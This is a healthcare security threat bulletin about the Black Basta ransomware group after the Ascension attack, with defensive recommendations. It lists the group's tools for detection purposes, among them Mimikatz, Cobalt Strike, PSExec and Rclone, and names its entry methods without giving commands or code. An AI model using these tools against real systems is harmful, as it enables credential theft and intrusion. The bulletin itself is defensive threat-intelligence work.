Alert essentials:
The following information is derived from documentation rated as “TLP: CLEAR,” which may be shared without restriction.
In the wake of the cybersecurity event affecting Ascension, open-source reporting has attributed the attack to Black Basta, a known threat group.
CISA has released additional IOCs under its #StopRansomware campaign (also included in the References section below).
Detailed Threat Description:
Updated IOCs for the Black Basta group have been published under CISA’s #StopRansomware campaign. Tools known to be used by the group include but are not limited to:
- BITSAdmin
- Cobalt Strike
- Mimikatz
- PSExec
- PowerShell
- Rclone
- ScreenConnect
- WinSCP
Although a more detailed description and additional IOCs are provided, this list of tools proves that Black Basta leverages living-off-the-land techniques, which can be difficult to detect.
Their most common method of entry is through social engineering tactics such as phishing, vishing, and exploiting ConnectWise vulnerabilities, which have recently been made public.
Note: Fortified’s original bulletin on the Ascension Health situation was published and distributed last week.
Impacts on Healthcare Organizations:
This tactic is part of the initial access in an attack chain. At best, if the initial access is obtained, it is unauthorized access to email or remote applications, resulting in a potentially disclosable event.
In a worst-case scenario, the attacker can escalate privileges, steal or exfiltrate data from the environment, and deploy a malicious payload, often leading to a ransomware outbreak. Such incidents severely threaten patient safety and operational stability.
Recommendations
Engineering recommendations:
- Apply IOCs to monitoring and detection/response tools
- Review access policies and reduce/disable erroneous or inactive accounts
- Implement application authorization where possible to minimize the introduction and execution of unapproved applications and tools
Leadership / program recommendations:
- Review Incident Response procedures and consider coordinating a micro tabletop exercise to run internally with your respective teams
- Keep the conversation around Incident Response (IR) preparedness active and consider prioritizing changes where necessary to harden your environment
- Be on the lookout for updated IOCs from reputable sources
Fortified recommends applying patches and updates where possible and only after adequate testing in a development environment to ensure stability and compliance with organizational change management policies.
References:
- https://www.ic3.gov/Media/News/2024/240511.pdf
- https://www.securityweek.com/black-basta-ransomware-hit-over-500-organizations
- https://fortifiedhealthsecurity.com/threat-bulletin/ascension-incident
- https://fortifiedhealthsecurity.com/blog/living-off-the-land-attacks
- https://fortifiedhealthsecurity.com/blog/healthcare-social-engineering
- https://fortifiedhealthsecurity.com/threat-bulletin/screenconnect-change-healthcare
- On-demand recording of Fortified’s tabletop exercise webinar
- https://fortifiedhealthsecurity.com/blog/hospital-cyber-attack